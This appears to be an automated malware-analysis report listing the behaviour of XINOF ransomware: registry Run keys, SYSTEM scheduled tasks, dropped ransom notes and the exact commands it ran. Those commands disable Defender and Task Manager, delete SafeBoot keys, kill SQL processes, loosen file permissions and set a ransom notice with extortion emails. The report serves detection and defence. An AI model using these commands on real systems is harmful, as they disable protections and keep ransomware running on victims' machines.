Technical Information
- [<HKLM>\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run] 'Michael Gillespie' = '%ALLUSERSPROFILE%\XINOF.exe'
- [<HKCU>\SOFTWARE\Microsoft\Windows\CurrentVersion\Run] 'Michael Gillespie' = '%ALLUSERSPROFILE%\XINOF.exe'
- [<HKLM>\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce] 'Michael Gillespie' = '%ALLUSERSPROFILE%\XINOF.exe'
- [<HKCU>\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce] 'Michael Gillespie' = '%ALLUSERSPROFILE%\XINOF.exe'
- <SYSTEM32>\tasks\fonix
- <SYSTEM32>\tasks\fonix11
- <SYSTEM32>\tasks\fonix10
- <Drive name for removable media>:\how to decrypt files.hta
- <Drive name for removable media>:\help.txt
- <Drive name for removable media>:\cpriv.key
- <Drive name for removable media>:\join.avi
- <Drive name for removable media>:\dashborder_96.bmp
- <Drive name for removable media>:\dashborder_144.bmp
- <Drive name for removable media>:\dashborder_192.bmp
- <Drive name for removable media>:\dialmap.bmp
- <Drive name for removable media>:\default.bmp
- <Drive name for removable media>:\coffee.bmp
- <Drive name for removable media>:\sdksampleunprivdeveloper.cer
- <Drive name for removable media>:\contoso.cer
- <Drive name for removable media>:\testee.cer
- <Drive name for removable media>:\testcertificate.cer
- <Drive name for removable media>:\contoso_1.cer
- <Drive name for removable media>:\hanni_umami_chapter.doc
- Windows Task Manager (Taskmgr)
- [<HKCU>\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer] 'NoClose' = '00000001'
- [<HKCU>\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer] 'StartMenuLogOff' = '00000001'
- '%WINDIR%\syswow64\taskkill.exe' /t /f /im sql*
- %ALLUSERSPROFILE%\xinof.exe
- C:\far2\addons\colors\custom_highlighting\how to decrypt files.hta
- C:\far2\addons\colors\custom_highlighting\help.txt
- C:\far2\addons\colors\custom_highlighting\cpriv.key
- C:\far2\addons\colors\default_highlighting\how to decrypt files.hta
- C:\far2\addons\colors\default_highlighting\help.txt
- C:\far2\addons\colors\default_highlighting\cpriv.key
- C:\far2\addons\macros\how to decrypt files.hta
- C:\far2\addons\macros\help.txt
- C:\far2\addons\macros\cpriv.key
- C:\far2\addons\setup\how to decrypt files.hta
- C:\far2\addons\setup\cpriv.key
- C:\far2\documentation\help.txt
- C:\far2\addons\shell\how to decrypt files.hta
- C:\far2\addons\shell\help.txt
- C:\far2\addons\shell\cpriv.key
- C:\far2\addons\xlat\how to decrypt files.hta
- C:\far2\addons\xlat\help.txt
- C:\far2\addons\xlat\cpriv.key
- C:\far2\addons\xlat\russian\how to decrypt files.hta
- C:\far2\addons\xlat\russian\help.txt
- C:\far2\addons\xlat\russian\cpriv.key
- C:\far2\documentation\how to decrypt files.hta
- C:\far2\addons\colors\cpriv.key
- C:\far2\addons\setup\help.txt
- C:\far2\addons\colors\help.txt
- D:\help.txt
- %ALLUSERSPROFILE%\microsoft\windows\start menu\programs\startup\xinof.exe
- <Current directory>\cpriv.key
- <Current directory>\cpub.key
- %ALLUSERSPROFILE%\cpub.key
- %ALLUSERSPROFILE%\cpriv.key
- <Current directory>\systemid
- %ALLUSERSPROFILE%\systemid
- %ALLUSERSPROFILE%\how to decrypt files.hta
- %ALLUSERSPROFILE%\help.txt
- D:\how to decrypt files.hta
- %ALLUSERSPROFILE%\microsoft\windows\start menu\programs\startup\how to decrypt files.hta
- C:\far2\addons\cpriv.key
- %ALLUSERSPROFILE%\microsoft\windows\start menu\programs\startup\help.txt
- D:\cpriv.key
- C:\how to decrypt files.hta
- C:\help.txt
- C:\cpriv.key
- C:\far2\how to decrypt files.hta
- C:\far2\help.txt
- C:\far2\cpriv.key
- C:\far2\addons\how to decrypt files.hta
- C:\far2\addons\help.txt
- C:\far2\addons\colors\how to decrypt files.hta
- C:\far2\documentation\cpriv.key
- ClassName: '' WindowName: ''
- '%WINDIR%\syswow64\cmd.exe' /c chcp 437
- '%WINDIR%\syswow64\icacls.exe' * /grant Everyone:(OI)(CI)F /T /C /Q
- '%WINDIR%\syswow64\cmd.exe' /c reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\OEMInformation /v Manufacturer /t REG_SZ /d "XINOF Ransomware Version 3.3" /f
- '%WINDIR%\syswow64\reg.exe' add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\OEMInformation /v Manufacturer /t REG_SZ /d "XINOF Ransomware Version 3.3" /f
- '%WINDIR%\syswow64\cmd.exe' /c reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\OEMInformation /v SupportHours /t REG_SZ /d "24 * 7 * 365" /f
- '%WINDIR%\syswow64\reg.exe' add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\OEMInformation /v SupportHours /t REG_SZ /d "24 * 7 * 365" /f
- '%WINDIR%\syswow64\cmd.exe' /c reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\OEMInformation /v SupportPhone /t REG_SZ /d "contact us using this emails Kmira98einkm@cock.li mojagkrak9879@cock.l...
- '%WINDIR%\syswow64\reg.exe' add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\OEMInformation /v SupportPhone /t REG_SZ /d "contact us using this emails Kmira98einkm@cock.li mojagkrak9879@cock.li " /f
- '%WINDIR%\syswow64\cmd.exe' /c reg add HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System /v legalnoticecaption /t REG_SZ /d "ALL Your Files Has Been Encrypted Using XINOF v4.2" /f
- '%WINDIR%\syswow64\reg.exe' add HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System /v legalnoticecaption /t REG_SZ /d "ALL Your Files Has Been Encrypted Using XINOF v4.2" /f
- '%WINDIR%\syswow64\cmd.exe' /c reg add HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System /v legalnoticetext /t REG_SZ /d "All of your files encrypted. If want to recover your files contact ...
- '%WINDIR%\syswow64\cmd.exe' /c Copy Cpub.key %ALLUSERSPROFILE%\Cpub.key
- '%WINDIR%\syswow64\cmd.exe' /c Copy SystemID %ALLUSERSPROFILE%\SystemID
- '%WINDIR%\syswow64\reg.exe' add HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System /v legalnoticetext /t REG_SZ /d "All of your files encrypted. If want to recover your files contact me by ...
- '%WINDIR%\syswow64\cmd.exe' /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoClose /t REG_DWORD /d 1 /f
- '%WINDIR%\syswow64\reg.exe' add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoClose /t REG_DWORD /d 1 /f
- '%WINDIR%\syswow64\cmd.exe' /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v StartMenuLogOff /t REG_DWORD /d 1 /f
- '%WINDIR%\syswow64\reg.exe' add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v StartMenuLogOff /t REG_DWORD /d 1 /f
- '%WINDIR%\syswow64\cmd.exe' /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
- '%WINDIR%\syswow64\reg.exe' add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
- '%WINDIR%\syswow64\cmd.exe' /c reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
- '%WINDIR%\syswow64\reg.exe' add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
- '%WINDIR%\syswow64\cmd.exe' /c reg delete HKEY_CURRENT_USER\System\CurrentControlSet\Control\SafeBoot /va /F
- '%WINDIR%\syswow64\reg.exe' delete HKEY_CURRENT_USER\System\CurrentControlSet\Control\SafeBoot /va /F
- '%WINDIR%\syswow64\cmd.exe' /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\System /v AllowBlockingAppsAtShutdown /t REG_DWORD /d 1 /f
- '%WINDIR%\syswow64\reg.exe' add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\System /v AllowBlockingAppsAtShutdown /t REG_DWORD /d 1 /f
- '%WINDIR%\syswow64\cmd.exe' /c Copy Cpriv.key %ALLUSERSPROFILE%\Cpriv.key
- '%WINDIR%\syswow64\cmd.exe' /c taskkill /t /f /im sql*
- '%WINDIR%\syswow64\reg.exe' add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLinkedConnections /t REG_DWORD /d 1 /f
- '%WINDIR%\syswow64\cmd.exe' /c schtasks /CREATE /SC ONLOGON /TN fonix /TR %ALLUSERSPROFILE%\XINOF.exe /RU SYSTEM /RL HIGHEST /F
- '%WINDIR%\syswow64\schtasks.exe' /CREATE /SC ONLOGON /TN fonix /TR %ALLUSERSPROFILE%\XINOF.exe /RU SYSTEM /RL HIGHEST /F
- '%WINDIR%\syswow64\cmd.exe' /c copy %ALLUSERSPROFILE%\XINOF.exe "%appdata%\Microsoft\Windows\Start Menu\Programs\Startup\XINOF.exe"
- '%WINDIR%\syswow64\cmd.exe' /c copy %ALLUSERSPROFILE%\XINOF.exe "%ALLUSERSPROFILE%\Microsoft\Windows\Start Menu\Programs\Startup\XINOF.exe"
- '%WINDIR%\syswow64\cmd.exe' /c schtasks /CREATE /SC ONLOGON /TN fonix /TR %ALLUSERSPROFILE%\XINOF.exe /F
- '%WINDIR%\syswow64\schtasks.exe' /CREATE /SC ONLOGON /TN fonix /TR %ALLUSERSPROFILE%\XINOF.exe /F
- '%WINDIR%\syswow64\cmd.exe' /c attrib +h +s "%appdata%\Microsoft\Windows\Start Menu\Programs\Startup\XINOF.exe"
- '%WINDIR%\syswow64\attrib.exe' +h +s "%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\XINOF.exe"
- '%WINDIR%\syswow64\cmd.exe' /c reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ /v "Michael Gillespie" /t REG_SZ /d %ALLUSERSPROFILE%\XINOF.exe /f
- '%WINDIR%\syswow64\reg.exe' add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ /v "Michael Gillespie" /t REG_SZ /d %ALLUSERSPROFILE%\XINOF.exe /f
- '%WINDIR%\syswow64\cmd.exe' /c reg add HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ /v "Michael Gillespie" /t REG_SZ /d %ALLUSERSPROFILE%\XINOF.exe /f
- '%WINDIR%\syswow64\chcp.com' 437
- '%WINDIR%\syswow64\reg.exe' add HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ /v "Michael Gillespie" /t REG_SZ /d %ALLUSERSPROFILE%\XINOF.exe /f
- '%WINDIR%\syswow64\reg.exe' add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\ /v "Michael Gillespie" /t REG_SZ /d %ALLUSERSPROFILE%\XINOF.exe /f
- '%WINDIR%\syswow64\cmd.exe' /c reg add HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\ /v "Michael Gillespie" /t REG_SZ /d %ALLUSERSPROFILE%\XINOF.exe /f
- '%WINDIR%\syswow64\reg.exe' add HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\ /v "Michael Gillespie" /t REG_SZ /d %ALLUSERSPROFILE%\XINOF.exe /f
- '%WINDIR%\syswow64\cmd.exe' /c schtasks /CREATE /SC ONLOGON /TN fonix11 /TR "<Full path to file>" /RU SYSTEM /RL HIGHEST /F
- '%WINDIR%\syswow64\schtasks.exe' /CREATE /SC ONLOGON /TN fonix11 /TR "<Full path to file>" /RU SYSTEM /RL HIGHEST /F
- '%WINDIR%\syswow64\cmd.exe' /c schtasks /CREATE /SC ONLOGON /TN fonix10 /TR "<Full path to file>" /F
- '%WINDIR%\syswow64\schtasks.exe' /CREATE /SC ONLOGON /TN fonix10 /TR "<Full path to file>" /F
- '%WINDIR%\syswow64\cmd.exe' /c start cmd.exe /c icacls * /grant Everyone:(OI)(CI)F /T /C /Q
- '%WINDIR%\syswow64\cmd.exe' /c reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLinkedConnections /t REG_DWORD /d 1 /f
- '%WINDIR%\syswow64\cmd.exe' /c icacls * /grant Everyone:(OI)(CI)F /T /C /Q
- '%WINDIR%\syswow64\cmd.exe' /c start cmd.exe /c taskkill /t /f /im sql*
- '%WINDIR%\syswow64\cmd.exe' /c reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\ /v "Michael Gillespie" /t REG_SZ /d %ALLUSERSPROFILE%\XINOF.exe /f
- '%WINDIR%\syswow64\cmd.exe' /c reg delete HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\SafeBoot /va /F
- '%WINDIR%\syswow64\reg.exe' delete HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\SafeBoot /va /F